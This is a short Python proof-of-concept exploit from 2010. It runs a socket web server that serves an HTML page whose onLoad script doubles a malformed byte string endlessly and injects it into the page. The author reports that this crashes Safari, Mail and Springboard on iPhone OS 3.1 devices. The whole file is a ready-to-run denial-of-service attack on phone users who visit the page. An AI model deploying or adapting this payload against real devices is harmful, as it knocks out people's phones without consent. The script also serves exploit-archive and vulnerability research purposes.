#!/usr/bin/python

#iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3
#this script acts as webserver, and causes Safari, as well as Mail and Springboard to crash
#all these apps crash after running this exploit on the iPhone. Unable to debug any of these processes as the gdb on my
#device is acting up, original iPhone is just too low memory to further test this exploit, so I am releasing it

# Exploit Title: iPhone Springboard Malformed Character Crash PoC
# Date: 3/15/2010
# Author: Chase Higgins
# Software Link: apple.com/iphone/
# Version: iPhone 2G, iPhone 3GS
# Tested on: iPhone OS 3.1, and iPhone OS 3.1.3
# CVE :
# Code : none

import sys, socket;

def main():
 html = """
 <html>
 <head>
 <script>
 function triggerCrash(){
  evil_div = document.getElementById('evilDiv');
  var evil_string = "\x4e\x5b\x01";
  i = 0;

  while (i < 1000){
   evil_string = evil_string + evil_string;
  }

  evil_div.innerHTML = evil_string;
 }
 </script>
 </head>
 <body onLoad="triggerCrash()">
 <div id="evilDiv">
 
 </div>
 </body>
 </html>
 """;

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
 s.bind(('',2121));
 s.listen(1);
 
 while True:
  channel, details = s.accept();
  print channel.recv(1024);
  channel.send(html);
  channel.close();
 
main();